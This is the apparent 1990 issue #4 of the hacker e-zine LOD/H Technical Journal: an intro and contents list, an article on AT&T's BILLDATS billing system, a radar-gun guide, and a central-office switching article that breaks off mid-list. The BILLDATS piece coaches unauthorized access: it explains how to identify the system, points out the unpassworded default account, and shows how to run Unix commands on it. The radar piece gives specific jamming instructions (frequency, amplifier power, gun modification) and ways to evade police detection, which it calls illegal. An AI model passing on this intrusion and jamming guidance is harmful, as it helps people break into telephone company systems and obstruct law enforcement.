The LOD/H Technical Journal, Issue #4: File 01 of 10 
Finally Released: May 20, 1990 
 
                                      THE 
 
                           LOD/H TECHNICAL JOURNAL 
 
                                  INTRODUCTION 
                                  ------------- 
 
 
We are still alive. This publication is not released on any schedule. Past 
attempts at scheduling issues have failed miserably. The editors refuse to 
release issues which are not up to our self-defined standards. We have in the 
past, and will continue in the future, to accept articles from anyone (e.g. 
non LOD) as long as the articles adhere to our basic format and style. The 
editors review all articles to verify accuracy and integrity however it may 
not be  possible in all cases to check every fact. Plagiarized material is not 
acceptable and we make every attempt to verify an article's originality. When 
referenced material is used, the source for that material must be clearly 
stated. The more articles we receive the sooner each issue is released. There 
is a minimum 2 month review and editing period for each article. If you want 
to contribute articles contact any member and they will forward articles to 
the editors. 
 
There seems to be some confusion as to what writers are (or were) in LOD/H and 
what ones aren't. JUST BECAUSE SOMEONE WRITES FOR THIS PUBLICATION DOES NOT 
MEAN THEY ARE AN LOD/H MEMBER! Just to clear up any confusion, a current 
member list follows: 
 
Erik Bloodaxe 
Lex Luthor 
Prime Suspect 
Phase Jitter 
Professor Falken 
Skinny Puppy 
 
File 06: The History of LOD/H is a short article explaining the origin of the 
group. We realize this is of interest to only a few, and most people probably 
could care less. However, also included is a list of EVERY member who was ever 
in the group. This is to clear up any and all misconceptions about members. 
The press, telecommunications and computer security people, law enforcement, 
and others can finally get their facts straight [See Issue #3, article 10, 
Clearing up the mythical LOD/H Busts for a prime example, and also in the 
Network News and Notes section -- first two articles regarding more so called 
'LOD BUSTS']. Another purpose is to thwart would-be group impostors. SYSOPS 
who give system access to individuals solely because they are a member of some 
respected group are urged to verify the hacker's identity as best they can. No 
one should be taken on their word alone. 
 
This issue is dedicated to the three (now "retired") members who recently 
received visits from our friends and yours, the U.S. Secret Service and 
Bell South Security: The Leftist, The Urvile, and The Prophet. Again, see 
the Network News and Notes section for the stories. 
Although the TJ is distributed to many boards, the inability for any decent 
board to consistently remain online prevents us from utilizing "sponsor" 
boards as distribution hubs. Therefore, the TJ will be distributed to whatever 
boards are around at the time of release. Due to the lack of boards the 
newsletter will be distributed in diskette form to those who can help in its 
distribution. 
 
 
___________________________________________________________________________ 
 
                                TABLE OF CONTENTS 
 
 
Name of article or file                            Author                Size 
----------------------------------------------------------------------------- 
01 Introduction to the LOD/H Technical Journal     Staff                 04K 
   and Table Of Contents for Issue #4 
 
02 The AT&T BILLDATS Collector System              Rogue Fed             14K 
 
03 The RADAR Guidebook                             Professor Falken      17K 
 
04 Central Office Operations                       Agent Steal           32K 
 
05 A Hackers Guide to UUCP                         The Mentor            27K 
 
06 The History Of LOD/H                            Lex Luthor            12K 
 
07 The Trasher's Handbook to BMOSS                 Spherical Abberation  11K 
 
08 The LOD/H Telenet Directory Update #4  Part A   Erik Bloodaxe         65K 
 
09 The LOD/H Telenet Directory Update #4  Part B   Erik Bloodaxe         43K 
 
10 Network News and Notes                          Staff                 38K 
 
 
Total:  7 Articles  10 Files  263K 
 
____________________________________________________________________________ 
 
                               End Of Intro/TOC 
                                    Issue #4 
The LOD/H Technical Journal, Issue #4: File 02 of 10 
 
 
                          The AT&T BILLDATS Collector 
                                  Written by: 
                                   Rogue Fed 
 
============================================================================== 
 
 
NOTES: This article will hopefully give you a better understanding of how 
the billing process occurs. BILLDATS is just one part of the billing picture. 
Before I began working for the government, I was a Telco employee and thus, 
the information within this article has been learned through experience. 
Unfortunately, I was only employed for a few months (including training on 
BILLDATS) and am still learning more about the many systems that a telco uses. 
There are however, a couple of lists that were compiled and slightly modified 
from what little reference material I could smuggle out and my notes from the 
training class. This article does require a cursory knowledge of telco and 
computer operations (ie. switching, SCCS, UNIX). 
 
 
INTRODUCTION - 
============== 
 
BILLDATS - BILLing DATa System 
 
BILLDATS can be explained in a nutshell by the acronym listed above. If it's 
one thing telecommunications providers do well, it's creating acronyms. 
Basically, BILLDATS collects billing information (that's why they call it a 
Collector) from AMATs (Automatic Message Accounting Transmitters). The AMATs 
are situated in or close to switching offices and are connected to BILLDATS 
either through dedicated or dial-up lines. BILLDATS can be considered as 
the "middleman" in the billing process. The system collects, validates, and 
adds identification information regarding origination and destination. This 
is then transferred to tape (or transmitted directly) to the RPC (Regional 
Processing Center) or the RAO (Revenue Accounting Office). The RPC/RAO 
actually processes the billing information. Typically the BILLDATS system is 
located in the same or adjoining building (but can be across town) to 
the RPC/RAO. 
 
BILLDATS is similar to many other phone company systems (ie. SCCS) as it uses 
a combination of software. The software base is UNIX and the BILLDATS Generic 
program runs on it. The hardware used is an AT&T 3B20 (this is what 5ESS 
switches use). 
 
Some of the more interesting features BILLDATS possesses are: 
 
*        Can be accessed via dialup (always a plus). 
*        Runs under UNIX (another plus). 
*        Interface with SCCS (yet another plus). 
*        Can store about 12 million calls for the first two disks and about 
         8 million calls for each additional disk. A total of 6 (675 MB) disks 
         can be used. 
*        Inserts the sensor type and ID and recording office type and ID onto 
         every AMA record that it collects. 
*        Capable of collecting information from nearly 600 AMATs. 
 
To better understand how/why you get a bill after making long distance phone 
calls, I have delineated the steps involved. 
 
You call Hacker X and tell him all about the latest busts that have occurred, 
he exclaims "Oh Shit!" hangs up on you and throws all his hacking information 
into the fireplace. The actual call is referred to as a call event. As each 
event happens (upon termination of the call) the event is recorded by the 
switch. This information is then sent via an AMA Transmitter which formats the 
information and then sends it to BILLDATS (commonly called a "Host 
Collector"). BILLDATS then provides the information to the RAO/RPC. The 
billing computer is located at the RAO/RPC. Do not confuse the actual billing 
system with BILLDATS! The billing computer: 
 
*   Contains customer records 
*   Credit ratings (in some telcos) 
*   Totals and prints the bill 
*   Generates messages when customers do not pay (ie. last chance and 
    temporary termination of service) 
 
When the billing period is over, (typically 25-30 days), many events (it 
depends on how many calls you have made) have accumulated. A bill is then 
generated and mailed to you. 
 
 
COLLECTION - 
============ 
 
BILLDATS collects information in two ways: 
 
1.       AMATs 
2.       Users 
 
AMAT input 
---------- 
 
BILLDATS collects data from the AMAT either directly from the switch, or from 
a front end which performs some processing on the data before giving it to 
BILLDATS. The data I am talking about here is usually AMA billing information. 
The information is in the usual AMA format (see Phantom Phreaker's article in 
the LOD/H Technical Journal, Issue #3 on AMA for formats and other info). As 
I said earlier, the recording office and sensor types and IDs have to be 
added by BILLDATS. The other information that is transmitted is usually 
maintenance data. 
 
The data that is transferred between BILLDATS and an AMAT is accomplished 
over either dedicated or dialup lines using the BX.25 protocol. This protocol 
has been adopted by the telecommunications industry as a whole. It is 
basically a modified version of X.25. 
 
User input 
---------- 
 
This is simply sysadmin and sysop information. 
 
 
INSERTED INFORMATION - 
====================== 
 
Once the information is collected, additional data (mentioned earlier) 
must be inserted. The information that BILLDATS inserts into the AMA records 
it receives depends on whether the AMAT is a single or multi-switch AMAT. 
Either way, the data is passed through the DEP. The DEP is a module which 
is part of the LHS (Link Handler Subsystem) that actually inserts the 
additional data. It also performs other functions which are rather 
uninteresting to the hacker. The LHS manages the x-mission of all the 
collected information. This is either through dedicated or dialup lines. The 
LHS is responsible for: 
 
*   Logging of statistics as related to the performance of links. 
*   Polling of remote switches for maintenance and billing information. 
*   Passing information to the DEP in which additional information is 
    inserted. 
*   Storing billing information. 
*   Other boring stuff. 
 
 
AMATS - 
======= 
 
Basically an AMAT is a front end to the switch. The AMAT: 
 
*   Gets AMA information from the switch. 
*   Formats and processes the information. 
*   Transmits it to BILLDATS. 
*   An AMAT can also store information for up to 1 week. 
 
The following is a list of switches and their related AMAT equipment that 
BILLDATS obtains billing information from: 
 
1A ESS: This is usually connected to a 3B APS (Attached Processor System) or 
        BILLDATS AMAT. 
2ESS:   This is connected to an IBM Series 1 AMAT. 
2BESS:  Connected to a BILLDATS AMAT. 
4ESS:   Connects to 3B APS. 
5ESS:   Direct connection. 
TSPS 3B:Direct connection. 
DMS-10: Connects to IBM Series 1 AMAT. 
 
There are other AMATs/Switches but they must be compatible with the BILLDATS 
interface. 
 
 
ACCESSING BILLDATS - 
==================== 
 
Even though a system is UNIX based, that doesn't mean that it is a piece of 
cake to get into. Surprisingly (when you think about the average Intelligence 
Quotient of telco personnel) but not surprisingly (when you consider that the 
information contained on the system is BILLING information--the life blood of 
the phone company) BILLDATS is a little more secure than your average telco 
system, except for the fact the all login IDs are 5 lower case characters or 
less. BILLDATS can usually be identified by: 
 
bcxxxx 3bunix SV_R2+ 
 
where: 
 
bc = B(ILLDATS) C(ollector). 
xxxx = The node suffix. This is entered when the current Generic is installed. 
3bunix = This simply indicates that UNIX is running on an AT&T 3Bxx system. 
SV_R2+ = Software Version. 
 
The good news is that there is a default username when the system is 
installed. The bad news is that upon logon, the system forces you to choose a 
password. The default username is not passworded initially. The added security 
feature is simply that the system forces all usernames to have passwords. If 
it doesn't have an associated password, the system will give you the message: 
 
"Your password has expired. Choose a new one" 
 
A 6-8 character password must then be entered. After this you will be asked 
to enter the terminal type. The ones provided are AT&T terminals (615, 4425, 
and 5420 models). Once entered a welcome message will probably be displayed: 
 
"Welcome to the South Western Bell BILLDATS Collector" 
"Generic 3, Issue 1" 
"Tuesday 01 Aug 1989 12:44:44 PM" 
 
dallas> 
 
The BILLDATS prompt was displayed "dallas>" where dallas is the node name. 
 
There are 3 privilege levels within BILLDATS: 
 
1.       Administrator 
2.       Operator 
3.       UUCP 
 
*   Administrator privs are basically root privs. 
*   An account with Operator privs can still do about anything an Admin can do 
    except make data base changes. 
*   UUCP privs are the lowest and allow file transfer. 
 
 
Commands 
-------- 
 
Just like SCCS, UNIX commands can be entered while using BILLDATS. The format 
is: 
 
dallas>run-unx:$unix cmd^G; 
 
All unix commands must be preceded by "run-unx:" and end with a semicolon ";". 
The semicolon is the command terminator character (just like Carriage Return). 
 
BILLDATS isn't exactly user friendly, but it does have on-line help. There are 
a number of ways that it can be obtained: 
 
dallas> help-?;  or  help-??;  or  ?-help;  or  ??-help; 
 
If you want specific help: 
 
dallas> help-(command name); 
 
I can list commands forever, but between UNIX (commands every hacker should 
be familiar with) and help (any moron can use it), you can figure out which 
ones are important. 
 
 
Error Messages 
-------------- 
 
Just like SCCS, BILLDATS has some rather cryptic error messages. There are 
thousands of error messages, once you know a little about the format they 
are easier to understand. When a mistake is made, something similar to 
the following will appear: 
 
UI0029      (attempted command) is not a valid input string. 
 
  ^                   ^- error message information 
  | 
  |--  This is the subsystem and error message number 
 
The following is a brief description of subsystem abbreviations: 
 
BD: BILLDATS system utilities. Errors associated with the use of utility 
    programs will be displayed. 
DB: Data Base manager. These messages are generated when accessing or 
    attempting to access the various Data Bases (explained later) within 
    BILLDATS. 
DM: Disk Manager. Basically, information pertaining to the system disk(s). 
EA: Error and Alarm. As the name implies, system errors and alarms. 
LH: Link Handler. Messages related to data link activity, either between 
    BILLDATS and the AMAT or BILLDATS and the RAO/RPC. 
SC: Scheduler. The scheduler is BILLDATS' version of the UNIX cron daemon. 
    BILLDATS uses cron to schedule things like when to access remote systems. 
TW: Tape Writer. Messages related to storing billing information on tapes 
    which will then be transported to the RAO/RPC. 
UI: User Interface. This was used in the above example. Displays syntax, 
    range or status errors when entering commands. 
DL: Direct Link. Instead of BILLDATS information being written to tape, a 
    direct link to the RPC/RAO mainframe (the actual billing system computer) 
    can be accomplished. This is usually done when BILLDATS is located far 
    away from the RPC/RAO office as there is always some risk involved in 
    transporting tapes, and that risk increases the farther away the two 
    offices are. Another neat thing about Direct Link is that the billing data 
    can be sent across a LAN (Local Area Network) also. Obviously this incurs 
    some concerns regarding security, but from what I have heard and seen, 
    AT&T and the BOC's typically choose to ignore the security of their 
    systems which suits me just fine. The Direct Link is an optional BILLDATS 
    feature and if it is in use, messages related to its operation are 
    displayed with the DL prefix. 
 
 
BILLDATS DATA BASES - 
===================== 
 
The databases contain all kinds of useful information such as usernames, 
switch types, scheduled polling times, etc. 
 
The AMAT Data Base contains: 
 
*   Type of switch 
*   Sensor type and identification 
*   AMAT phone number 
*   Channel and port number/group 
*   Other boring information 
 
The Port Data Base contains: 
 
*   Communications information (like L-Dialers on UNIX Sys. V) 
*   Channel and port information 
*   Other boring information 
 
The Collector Data Base contains: 
 
*   Collector office ID 
*   Version number of the Data Base 
*   Number and speed of any remote terminals 
*   When reports are scheduled for output 
*   Other boring information 
 
 
CONCLUSION - 
============ 
 
If you are not technically oriented, I hope this article helped you understand 
how you get your bill. I assumed that you would skip over the commands for 
using BILLDATS and similar information. 
 
If you are technically oriented, I hope I not only helped you understand more 
about the billing process, but also increased your awareness of how detailed 
the whole process is. And if you do happen to stumble onto a BILLDATS system, 
you have been pointed in the right direction as far as using it correctly is 
concerned. 
 
I tried to leave out all the boring details, but some may have slipped by me. 
I reserved the right to omit specific details and instructions regarding any 
alteration or deletion of calls/charges for my own use/abuse. 
 
The Rogue Federal Agent 
 
 
                              [ End Of Article ] 
 
The LOD/H Technical Journal, Issue #4: File 03 of 10 
 
 
                             The Radar Guidebook 
                                      by 
                               Professor Falken 
 
 
----------------------------------------------------------------------------- 
 
   Anyone who has driven a car without a radar detector before, has gotten 
that paranoid feeling that the cops are around radaring.  This feeling is not 
a nice one; it is the feeling that somewhere somehow someone is watching you. 
In this article I will attempt to explain how radar guns work, what bands 
the guns work on, why they are wrong 70% of the time, how to employ stealth 
technology in defeating the radar, and last but not least jamming the radar. 
 
   RADAR stands for RAdio Detecting And Ranging.  A speed-radar gun works 
under the Doppler theory.  This theory is that when a signal is reflected off 
an object moving toward you, the signal will be at a higher frequency than the 
initial frequency, this increase in frequency is used to calculate speed. 
Many of you have experienced the Doppler effect, which occurs when a noise 
from a siren increases in strength (gets louder) as it approaches and 
decreases in strength (gets softer) as it moves away from you. 
 
   Right now in the United States, there are three bands that are Federal 
Communication Commission (FCC) certified for "field disturbance sensors", 
known to you and me as radar guns.  These bands have proper non-technical 
names, and all operate in the GigaHertz range.  GigaHertz is a measure of 
frequency; one GHz equals one billion cycles per second.  Most frequency 
modulation (FM) radio broadcasts are made in the 0.088 GHz to 0.108 GHz band, 
in MegaHertz that is 88 MHz to 108 MHz.  The three proper names for these 
radar bands are: X, K, and Ka. 
 
   One of the older radar bands is the X band.  X band radar is the most 
commonly used radar band in the United States.  X band radar transmits its 
signal at 10.5250 GHz.  The wattage of the radar's signal really depends upon 
the gun manufacturer.  However, most manufacturers agree that a 100 milliwatt 
signal is "High-Power" and the 40 milliwatt range is "Low Power".  The gun's 
range also depends upon the manufacturer.  The average maximum range of a X 
band gun is 2500 feet.  That estimate is based on the assumption that the gun 
is operating at full-strength (100mw).  Most radar detectors give off a 
false signals on this band due to ultrasonic motion detectors employed 
by various burglar alarm systems.  Large grocery stores also use these to 
open the doors magically as you walk in or out. 
 
   Another older band is K band.  K band operates on 24.150 GHz and is not as 
popular as X band, but it is gaining in usage throughout the country.  The 
normal signal strength of K band guns again depends upon the manufacturer, 
but the ones I've seen all operate at 100 milliwatts at high-power.  These 
guns have a maximum range of 3000 feet, assuming they are at 100mw signal 
strength. 
 
   A new type of radar has been introduced and assigned a frequency by the 
Federal Communications Commission.  This new band has been assigned the name 
Ka and has been designated a frequency of 34.360 GHz.  Current Ka technology 
gives the gun a maximum effective range of 40 to 200 feet.  This band 
was originally made for use with photo-radar.  The photo-radar can be set up 
on a tripod on the side of the road or in the back of a police car.  The 
user then triggers a button when he wants a car in the guns range 
clocked, automatically taking a picture of the car & license plate. 
At the time the photograph is taken a date and time is imprinted on the 
picture.  The police keep one duplicate for archival purposes and sends the 
other to the registered owner of the car along with ticket information and the 
amount due.   This type of system can only work in places that hold the owner 
of a vehicle responsible for any violations that occur with the car.  The 
legal barriers for photo radar to overcome are extensive, most notably, not 
giving the vehicle owner due process and the presumption of guilt.  There is 
a system out now for $19.95 that defeats Ka band photo radar.  I expect it to 
be illegal VERY QUICKLY once Ka is more widely used.  This little baby slips 
over your license plate and acts as venetian blinds.  When looking straight at 
the plate it looks like a normal plate with a black frame.  However when 
looking at it from a Ka band Photo Radar's angle it looks like a license plate 
with a silver streak covering the whole plate, making it impossible to 
identify.  This device is called the Photobuster and is available from 
most radar detector specialty stores. 
 
   There are two different types of radar guns.  They are Instant-On/Pulse and 
Constant Broadcasting Radar.  The names are self-explanatory, but I will 
explain them anyway.  The constant broadcast radar continually transmits 
its radar signal, and anything in its path will be clocked.  Instant-On & 
Pulse radars are basically identical, and are both very deadly since they are 
harder to detect as a threat.  The Instant-On gun is really nothing more than 
an ON/OFF switch for signal transmission.  In order to have a pulse gun, all 
a cop has to do is purchase one with a "HOLD" feature or just turn the gun 
on when he/she wishes to use it.  The "HOLD" feature is simply a button that 
keeps the gun on but makes sure no signal is being transmitted.  No one can 
detect a gun that is off or in "HOLD" mode.  An officer using an Instant-On 
radar gun will periodically check the speed of the traffic.  These samplings 
can easily be detected and will give the user of a detector prior warning to 
a Instant On/Pulse activated radar gun. 
 
   Many detectors on the market today provide anti-falsing circuitry.  Falsing 
is the triggering of the radar detector from something other than a radar gun. 
 
   One or two detector manufactures make their detectors with GaAs diodes. 
GaAs diodes are Gallium Arsenide diodes which are a military grade electrical 
component that helps produce a good signal-to-noise ratio. 
 
   All new model radar detectors use Superheterodyne technology. 
Superheterodyne, also known as active technology, amplifies all incoming 
signals hundreds of times, which makes it more sensitive and selective as to 
which signals will trigger an alert.  Superheterodyne technology also gives 
out a minute internal radar signal of its own, which can be picked up by older 
(Pre/Early 1980's) non-anti-falsing radar detectors.  If you have a newer 
model radar detector, this small internally generated signal is no problem to 
your's or anyone's anti-falsing radar detecting unit.  NOTE: In states 
where radar detectors are illegal (Ex. Virginia, Canada) the police have 
devices which detect this Superheterodyne signal.  Police can then stop 
you and confiscate your detector.  Getting around this police tactic 
would be to use an early radar detector without Heterodyne/Superheterodyne 
detection technology. 
 
   Many compact/shirt pocket radar units are "exclusively made with SMD's". 
These SMD's are Surface Mounted Devices and contain extremely small resistors, 
transistors, diodes, and capacitors.  Just because a manufacturer uses SMD's, 
that does NOT make the unit any better than a larger detector of the same age. 
 
   Cincinnati Microwave Inc., the makers of Escort and Passport say they have 
the exclusive technology for the detection and anti-falsing of RASHID VRSS 
technology.  RASHID VRSS is actually the Rashid Radar Safety Brake Collision 
Warning System.  It is an electronic device that operates on K band 
frequencies and warns heavy trucks and ambulances of hazards in their path. 
About 900 RASHID VRSS units have been prototyped in three states.  Since the 
number of actual operating RASHID units is so minute, I really doubt you will 
run into one. 
 
   There are two ways a radar gun can produce an incorrect speed reading. 
These are known as the Cosine Error and Moving Radar Error.  The Cosine Error 
occurs when a radar gun gives a lower reading than the actual speed of the 
target.  This occurs because the gun can only measure the doppler shift that 
occurs directly towards or away from the antenna.  If the object moves at an 
angle to the gun, the shift will be lower than if it moves directly at the 
antenna.  Therefore the reading the radar gun gives will be less than the 
actual speed of the object.  The radar reading can be calculated by taking 
the Actual Speed times the cosine of the incidence angle.  So if the target 
car's actual speed is 50 miles per hour and it is 37 degrees off of the 
mainline radar signal, the radar speed will be 40 miles per hour. Look: 
 
Cosine Error Theory: 
Actual Speed  x  Cosine of Incidence Angle  =  Radar's Shown Speed 
 
Cosine of 37 degrees is 0.80 
50 MPH  x  0.80  =  40 MPH 
 
So if you see a radar enabled cop coming head-on towards you it would be a 
good idea to get into the right hand lane, or further if possible, as this 
increases the angle and thus lowers your radar speed.  The other error is the 
Moving Radar Error, which occurs only when a police car is using a moving 
radar gun.  A false reading is obtained by the unit because before it 
can radar you it must radar something along side the road to get the patrol 
car's speed.  Most often, billboards and parked cars are used for this initial 
patrol car speed calibration.  It is susceptible to errors because of the 
Cosine Error, mentioned above.  Once the patrol car has its speed (wrong or 
not), it assumes that the target's (YOU) speed is the difference between the 
highest oncoming signal and the patrol speed; but if the patrol speed is lower 
it will ADD that error on to the target speed.  So the target speed (YOU) will 
read higher than you were actually traveling.  Here's the theory and a 
problem: 
 
Moving Radar Theory: 
Closing Speed  -  Patrol Speed  =  Target Speed 
 
The ACTUAL speeds for these are: 
Patrol Car Speed - 60 MPH 
Target Car Speed - 60 MPH 
Closing Speed - 120 MPH 
 
Due to the Cosine Error the TARGET CAR's speed will cause the gun to 
calculate a LOW reading for the actual patrol car's speed due to the cosine 
error. 
 
The RADAR calculated speeds are: 
Patrol Car Speed - 50 MPH 
Target Car Speed - 70 MPH 
Closing Speed - 120 MPH 
 
Thus you can see how the police car is going to get an incorrect reading. 
This is a good one to memorize and bring into court for any tickets. 
 
   It's been recently brought to my attention that there are stealth-bras for 
cars.  From what I understand, the bras actually absorb the radar, and reflect 
such a weakened signal that the radar gun cannot detect it.  I have not seen 
one of these in person, but from what I have heard they are made out of a VERY 
DENSE rubber/metal composite.  The bra probably traps the signal very much 
like the F-117/B-2 stealth aircraft do.  The material is probably made up of 
hexagonal shaped cells, the back of the cell being at a slight angle, so that 
any signal coming into the cell will have to bounce around within the cell 
before exiting it.  The inside of each cell is filled with a radar absorbing 
material.  As the signal hits the back of the hexagonal cell it is bounced 
around inside the cell through the absorbing material, weakening the signal 
each time it does so.  Upon leaving the cell, the signal is so weak the 
radar's receiver may not pick up the signal until the target is near enough 
to give a positive return on the radar screen.  When the aircraft is getting 
closer, within radar range, the signal reflected may be so small the radar's 
controller may think he is picking up ground interference, a flock of birds 
or possibly bad weather.  The actual radar absorbing material is classified at 
this time by the government.  The actual composite on the car bra is certainly 
not as good as the actual radar absorption material of the aircraft, but I'm 
sure it is somewhat similar. 
 
   Radar jamming is done very much the way any other type of radio jamming is 
done.  You simply overpower the frequency being used with a frequency of your 
own.  Radar jamming/overpowering is ILLEGAL in the United States.  To jam a 
signal all you need is a transmitter, an amplifier and an antenna.  To jam a 
gun using a K band radar (24.150 GHz) all you do is get a transmitter that can 
transmit in the 20 GHz range and a 10-100 watt amplifier and antenna.  Send 
out a signal at around 24.05 GHz.  This signal will make the cop's radar 
either show a 0 or an incredibly slow speed such as -520.  Usually the 
cop's radar cannot show a negative sign, so it will just be 520.  This 
10-100 watt signal that you are transmitting will overpower the signal 
his/her radar sent out and is waiting to receive.   His/her gun is only at 
100 milliwatts, and you're transmitting at 10-100 watts; its like using a 
12-gauge shotgun against a rodent. 
 
   Where can you get microwave transmission equipment?  You can check local 
electronic shops, satellite stores, Cable TV companies and local television 
stations as to where they buy their microwave transmission gear.  Or you can 
buy a radar gun of your own, and leave it ON whenever your driving.  This will 
give the cop's gun a very strange reading, most likely zero. If it is 
possible, once you have the gun bring it to a "corrupt" electronics shop and 
have it modified for high powered transmission, preferably in the 10 to 100 
watt range. 
 
   Some radar guns have resistors implemented just before the antenna, but 
just after the amplifier for de-amplification of the transmitter's signal. 
This means that most guns already have a good (1 watt or so) transmit 
capacity, but it is suppressed to bring the actual transmit signal to the 
100mw area.  The owner of the gun only has to know which resistors to take 
out, then he/she will have a functional high powered gun.  If this small 
wattage does not satisfy you, you may have to purchase a separate amplifier 
for the gun, and have it wired directly into the radar's transmitter antenna. 
This modification is expensive not to mention illegal, but then again what the 
hell isn't these days.  I have seen six different types of guns offered from 
National Radar Exchange.  The following are a few major radar gun 
manufacturers that are sold out of most radar shops. They are: 
 
KUSTOM SIGNAL: 
Kustom Signal HR-12  K Band 100mw signal 2000-3000 foot maximum range $695.00 
Kustom Signal HR-8   K Band 100mw signal 1800-3000 foot maximum range $495.00 
 
CMI INC.: 
Speedgun One  X Band 100mw signal 1000-2500 foot maximum range $395.00 
Speedgun Six  X Band 100mw signal 1000-2500 foot maximum range $495.00 
(Since these units are the same, the only differences are things like 
last speed reading recall, 10 number memory, etc.) 
 
MPH INC.: 
 
MPH K-55  X Band 40mw signal 1200-2500 foot maximum range $495.00 
(Can clock target in 1/2 second, which is exceptionally fast for radar guns) 
 
The only differences between the models are their bands and their options, 
such as a "HOLD" button, last speed recorded etc. 
 
   I have found these to be some of the top units in the radar detector world 
   currently and are listed as follows: 
 
MOST SENSITIVE   MOST FEATURES   BEST LOOKING   MOST RELIABLE    SMALLEST 
--------------   -------------   ------------   -------------  ------------- 
COBRA 4120       COBRA 4120      Whistler 3SE   ESCORT         Uniden RD-9XL 
BEL 944          COBRA 3160      BELL 944       K40            Whistler 3SE 
Snooper 6000     BELL 944        Uniden RD-9XL 
 
 BEST VALUE         LOUDEST           BEST FILTERED 
------------     --------------    ------------------ 
Snooper 4000     COBRA 5110        Snooper 6000 
Cobra 5110       COBRA 3120        Other Snoopers 
Cobra 3168       Whistler Q2002 
Maxon RD25 
 
   I did not get to see Cincinnati Microwave's new "SOLO", nor BEL's 
"Vector 3", "Express", nor it's newer "Legend 3." 
 
Just because a detector is the MOST sensitive doesn't mean it is the best 
detector.  Because of the sensitivity you could pick up more alarms.  What 
you want is a detector with excellent sensitivity, but good anti-falsing 
circuitry. 
 
   I hope this article has given you some insight on how radars work and 
how their tickets CAN be defeated.  Keep safe and sane, 
 
                                               Professor Falken 
                                                Legion Of Doom 
 
 
<EOF> 
The LOD/H Technical Journal, Issue #4: File 04 of 10 
 
 
            $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 
            $                                                  $ 
            $             Central Office Operations            $ 
            $            Western Electric 1ESS,1AESS,          $ 
            $         The end office network environment       $ 
            $                                                  $ 
            $            Written by Agent Steal 1989           $ 
            $                                                  $ 
            $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 
 
 
     Topics covered in this article will be: 
 
        Call tracing 
        RCMAC 
        Input/output messages 
        SCC and SCCS 
        COSMOS and LMOS 
        BLV, (REMOB) and "No test trunks" 
        Recent change messages 
        Equal Access 
 
    Did I get your attention? Good, everyone should read this. With the time, 
effort, and balls it has taken me compile this knowledge it is certainly worth 
your time. I hope you appreciate me taking the time to write this. 
 
    I should point out that the information in this article is correct to the 
best of my knowledge. I'm sure there are going to be people that disagree 
with me on some of it, particularly the references to tracing. However, I 
have been involved in telecommunications and computers for 12+ years. 
 
    I'm basing this article around the 1AESS since it is the most common 
switch in use today. 
 
 
     ** OUTSIDE PLANT ** 
 
    This is the wiring between your telephone and the central office. That is 
another topic in itself. If you are interested read Phucked Agent 04's article 
on The Outside Loop Distribution Plant (OLDP) in the LOD/H Technical Journal, 
Issue #1. The article explains those green boxes you see on street corners, 
aerial cables, manholes etc. So where that article stops, this one starts. 
 
 
     ** CABLE VAULT ** 
 
     All of the cables from other offices and from subscribers enter the 
central office underground. They enter into a room called the cable vault. 
This is a room generally in the basement located at one end or another of the 
building. The width of the room varies but runs the entire length of the 
building. Outside cables appear through holes in the wall. The cables then run 
up through holes in the ceiling to the frame room. 
 
     Understand that each of these cables consist of an average of 3600 pairs 
of wires. That's 3600 telephone lines. The amount of cables obviously depends 
on the size of the office. All cables (e.g. interoffice, local lines, fiber 
optic, coaxial) enter through the cable vault. 
 
 
     ** FRAME ROOM ** 
 
     The frame is where the cable separates into individual pairs and attach 
to connectors. The frame runs the length of the building, from floor to 
ceiling. There are two sides to the frame, the horizontal side and the 
vertical side. The vertical side is where the outside wiring attaches and the 
protector fuses reside. The horizontal side is where the connectors to the 
switching system reside. Multi-conductor cables run from the connectors to 
actual switching equipment. So what we have is a large frame called the Main 
Distribution Frame (MDF) running the entire length of the building. From floor 
to ceiling it is 5 feet thick. The MDF consists of two sides, the VDF and the 
HDF. Cables from outside connect on one side and cables from the switching 
equipment connect to the other side and jumper wires connect the two. This way 
any piece of equipment can be connected to any incoming "cable pair". These 
jumper wires are simply 2 conductor twisted pair, running between the VDF and 
the HDF. 
 
     What does all this mean? Well if you had access to COSMOS you would see 
information regarding cable and pair and "OE" (Office Equipment). With this 
information you could find your line on the frame and on the switch. The VDF 
side is clearly marked by cable and pair at the top of the frame, however the 
HDF side is a little more complicated and varies in format from frame to frame 
and from switch to switch. Since I am writing this article around the 1AESS, 
I will describe the OE format used for that switch. 
 
    OE  ABB-CDD-EFF 
 
   Where.. 
 
      A = Control Group (when more than one switch exists in that C.O.) 
      B = LN  Line Link Network 
      C = LS  Line Switching Frame 
      D = CONC or CONCentrator 
      E = Switch (individual, not the big one) 
      F = Level 
 
    There is one more frame designation called LOC or LOCation. This gives the 
location of the connector block on the HDF side. Very simply, looking at the 
frame: 
 
 
H  --------------------------------------------------------------------- 
 
G  --------------------------------------------------------------------- 
 
F  --------------------------------------------------------------------- 
 
E  --------------------------------------------------------------------- 
 
D  --------------------------------------------------------------------- 
 
C  --------------------------------------------------------------------- 
 
B  --------------------------------------------------------------------- 
 
A  --------------------------------------------------------------------- 
 
   123456789 etc. 
 
    Please note that what you are looking at here represents the HDF side of 
the MDF, being up to 100 feet long, and 20 feet high. Each "-" represents a 
connector block containing connections for 4 x 24 (which is 96) pairs. 
 
    So far I've covered how the wires get from you to the switching 
equipment. Now we get to the switching system itself. 
 
 
    ** SWITCHING SYSTEMS ** 
 
    Writing an article that covers them all would be lengthy indeed. So I am 
only going to list the major ones and a brief description of each. 
 
    - Step by Step 
      Strowger 1889 
      First automatic, required no operators for local calls 
      No custom calling or touch tone 
      Manufactured by many different companies in different versions 
      Hard wire routing instructions, could not choose an alternate route if 
      programed route was busy 
      Each dial pulse tripped a "stepper" type relay to find its path 
 
    - No.1 Crossbar 1930 
    - No.5 Crossbar 1947 (faster, more capacity) 
      Western Electric 
      First ability to find idle trunks for call routing 
      No custom calling, or equal access 
      Utilized 10x20 cross point relay switches 
      Hard wired common control logic for program control 
      Also copied by other manufactures 
 
    - No.4 Crossbar 
      Used as a toll switch for AT&T's long lines network 
      4 wire tandem switching 
      Not usually used for local loop switching 
 
    - No.1ESS  1966 
    - No.1AESS 1973 
      Western Electric 
      Described in detail later 
 
    - No.1EAX 
      GTE Automatic Electric 
      GTE's version of the 1AESS 
      Slower and louder 
 
    - No.2ESS  1967 
    - No.2BESS 1974 
      Western Electric 
      Analog switching under digital control 
      Very similar to the No.1ESS and No.1AESS 
      Downsized for smaller applications 
 
    _ No.3ESS 
